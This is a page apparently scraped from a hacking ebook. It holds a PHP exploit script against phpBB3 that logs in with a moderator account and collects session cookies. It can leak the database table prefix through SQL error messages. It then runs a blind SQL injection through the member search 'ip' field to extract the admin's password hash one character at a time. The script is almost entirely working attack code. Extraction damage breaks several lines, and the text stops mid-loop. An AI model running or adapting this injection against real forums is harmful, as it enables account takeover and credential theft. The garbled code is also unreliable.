
Hacker Professional Ebook part 409 pdf


you need a global moderator account with "simple moderator" role

*/

// Usage banner: printed when fewer than four positional arguments
// (host, path, user, pass) follow the script name; the script then stops.
if ($argc<5) {
    echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n",
         "host: target server (ip/hostname)\n",
         "path: path to phpbb3\n",
         "user/pass: u need a valid user account with global moderator rights\n",
         "Options:\n",
         " -T[prefix] specify a table prefix different from default (phpbb_)\n",
         " -p[port]: specify a port other than 80\n",
         " -P[ip:port]: specify a proxy\n",
         " -u[number]: specify a user id other than 2 (admin)\n",
         " -x: disclose table prefix through error messages\n",
         "Example:\r\n",
         "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n",
         "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n";
    exit;
}

// Runtime setup: PHP error output is switched off, the execution time limit
// is removed, and socket operations default to a 5-second timeout.
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

/**
 * Render a byte string as a two-part dump.
 *
 * The first part lists every byte as a space-prefixed, two-digit lowercase
 * hex value; the second part lists the characters themselves, with bytes
 * at or below 32 and above 126 shown as a blank. Both parts wrap with CRLF
 * after every 15 bytes and are joined by one CRLF.
 *
 * This helper is not called anywhere in the visible part of the script.
 *
 * @param string $string Raw bytes to dump.
 * @return string Hex part, CRLF, then the character part.
 */
function quick_dump($string)
{
    $hexPart = '';
    $textPart = '';
    $column = 0;
    $length = strlen($string);

    for ($pos = 0; $pos < $length; $pos++) {
        $byte = ord($string[$pos]);

        // Control bytes, the space character and anything above '~' are blanked.
        $printable = ($byte > 32) && ($byte <= 126);
        $textPart .= $printable ? " ".$string[$pos] : " ";

        // %02x yields the same zero-padded lowercase hex as dechex() plus manual padding.
        $hexPart .= sprintf(" %02x", $byte);

        // Start a new row in both parts once 15 bytes have been emitted.
        $column++;
        if ($column == 15) {
            $column = 0;
            $textPart .= "\r\n";
            $hexPart .= "\r\n";
        }
    }

    return $hexPart."\r\n".$textPart;
}

// Pattern used to accept a proxy given as dotted-quad "ip:port".
// The outer parentheses act as the regex delimiters.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) ';

/**
 * Send one raw request over a TCP socket and collect the reply.
 *
 * Reads the globals $proxy, $host, $port and $proxy_regex, and stores the
 * complete reply in the global $html. Nothing is returned. The script is
 * terminated with die if the connection cannot be opened or the proxy
 * string does not match $proxy_regex.
 *
 * @param string $packet Complete request text (request line, headers, body).
 */
function sendpacketii($packet)
{
    global $proxy, $host, $port, $html, $proxy_regex;
    if ($proxy=='') {
        // Direct mode: resolve the host name and connect to $port.
        $ock=fsockopen(gethostbyname($host),$port);
        if (!$ock) {
            echo 'No response from '.$host.':'.$port; die;
        }
    }
    else {
        // Proxy mode: the value must look like ip:port before it is split.
        $c = preg_match($proxy_regex,$proxy);
        if (!$c) {
            echo 'Not a valid proxy ';die;
        }
        $parts=explode(':',$proxy);
        echo "Connecting to ".$parts[0].":".$parts[1]." proxy \r\n";
        $ock=fsockopen($parts[0],$parts[1]);
        if (!$ock) {
            echo 'No response from proxy ';die;
        }
    }
    fputs($ock,$packet);
    if ($proxy=='') {
        // Direct mode: read line by line until the peer closes the connection.
        $html='';
        while (!feof($ock)) {
            $html.=fgets($ock);
        }
    }
    else {
        // Proxy mode: read one byte at a time; the condition tests for EOF and
        // for a CRLF CRLF sequence in what has been read so far.
        // NOTE(review): the space inside "$h tml" below is an artifact of this
        // page's text extraction; as printed the line is not valid PHP.
        $html='';
        while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) {
            $html.=fread($ock,1);
        }
    }
    fclose($ock);
    #debug
    #echo "\r\n".$html;
}

// Positional arguments, in the order given by the usage text.
$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];

// Defaults for the optional switches.
$port=80;
$prefix="PHPBB_";
$user_id="2";//admin
$discl=0;
$proxy="";

// Option scan. It starts at index 3, so the user and pass arguments are
// examined for option prefixes as well as the arguments that follow them.
for ($i=3; $i<=$argc-1; $i++){
    // The first two characters of the argument select the option.
    $temp=$argv[$i][0].$argv[$i][1];
    // Each value is the argument with every occurrence of the flag text
    // removed (str_replace), not only the leading one.
    if ($temp=="-p")
    {
        $port=str_replace("-p","",$argv[$i]); }
    if ($temp=="-P")
    {
        $proxy=str_replace("-P","",$argv[$i]); }
    if ($temp=="-T")
    {
        $prefix=str_replace("-T","",$argv[$i]); }
    if ($temp=="-u")
    {
        $user_id=str_replace("-u","",$argv[$i]); }
    if ($temp=="-x")
    {
        $discl=1;
    }
}

// The path must both start and end with "/"; otherwise the script stops.
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error check the path!'; die;}
// Through a proxy the request line carries an absolute URL; otherwise only the path.
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

// Login step: form body for ucp.php?mode=login using the supplied account.
$data="username=".urlencode($user);
$data.="&password=".urlencode($pass);
$data.="&redirect=index.php";
$data.="&login=Login";

// Hand-built request. For defenders reviewing web logs, this traffic has a
// fixed shape visible in the lines below: HTTP/1.0, no User-Agent header,
// "Accept-Encoding: text/plain", and a Referer with a doubled slash before
// ucp.php (the script requires $path to end in "/" and then appends "/ucp.php").
$packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n";
$packet.="Referer: http://$host$path/ucp.php?mode=login\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);

// Collect the first space-delimited piece after every "Set-Cookie: " in the
// reply and join the pieces with spaces into one Cookie header value.
$cookie="";
$temp=explode("Set-Cookie: ",$html); for ($i=1; $i<=count($temp)-1; $i++) {
    $temp2=explode(" ",$temp[$i]);
    $cookie.=" ".$temp2[0];
}

// The body of this check is commented out, so a match on "_u=1;" has no effect.
// NOTE(review): presumably "_u=1" marks a session that is still anonymous; confirm.
if (eregi("_u=1;",$cookie))
{
    //echo $html."\n";//debug
    //die("Unable to login ");
}
echo "cookie -> ".$cookie."\r\n";

// Optional step, enabled by -x: learn the table prefix from a database error
// message returned by the member search.
// NOTE(review): this step depends on the application returning the SQL error
// text to the client. An installation that does not render database errors in
// responses gives the check below nothing to match.
if ($discl)
{
    // A lone single quote followed by a marker word, upper-cased and URL-encoded.
    $sql="'suntzuuuuu";
    echo "sql -> ".$sql."\n";
    $sql=urlencode(strtoupper($sql));

    // Member-search form with every field empty except "ip".
    $data="username=";
    $data.="&icq=";
    $data.="&email=";
    $data.="&aim=";
    $data.="&joined_select=lt";
    $data.="&joined=";
    $data.="&yahoo=";
    $data.="&active_select=lt";
    $data.="&active=";
    $data.="&msn=";
    $data.="&count_select=eq";
    $data.="&count=";
    $data.="&jabber=";
    $data.="&sk=c";
    $data.="&sd=a";
    $data.="&ip=".$sql;
    $data.="&search_group_id=0";
    $data.="&submit=Search";

    // NOTE(review): the string literal below is broken across several lines and
    // contains stray spaces (e.g. "active_selec t"). These are artifacts of this
    // page's text extraction and are reproduced here as printed.
    $packet="POST ".$p."memberlist.php?joined_select=lt&active_selec t=lt&count_select=eq&s

k=c&sd=a&ip=%5C%27&form=post&field=username_list&m

ode=searchuser&form=po

st HTTP/1.0\r\n";
    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Content-Length: ".strlen($data)."\r\n";
    $packet.="Connection: Close\r\n";
    $packet.="Cookie: ".$cookie." \r\n\r\n";
    $packet.=$data;
    sendpacketii($packet);

    // If the reply contains the MySQL syntax-error text, take the last
    // space-delimited token before the first "posts" in the page and use it,
    // upper-cased, as the table prefix.
    if (strstr($html,"You have an error in your SQL syntax"))
    {
        $temp=explode("posts",$html);
        $temp2=explode(" ",$temp[0]);
        $prefix=strtoupper($temp2[count($temp2)-1]);
        echo "prefix -> ".$prefix."\n";sleep(2);
    }
}

$md5s[0]=0;//null

$md5s=array_merge($md5s,range(48,57)); //numbers

$md5s=array_merge($md5s,range(97,102));//a-f letters

//print_r(array_values($md5s));

$j=1;$password="";

while (!strstr($password,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

if (in_array($i,$md5s))

{

$sql="1.1.1.999') UNION SELECT IF

((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$us er_id,-1) FROM

".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";


echo "sql -> ".$sql."\n";

$sql=urlencode(strtoupper($sql));

$data="username=";

$data.="&icq=";

$data.="&email=";

$data.="&aim=";

$data.="&joined_select=lt";

$data.="&joined=";

Ngày đăng: 04/07/2014, 12:20
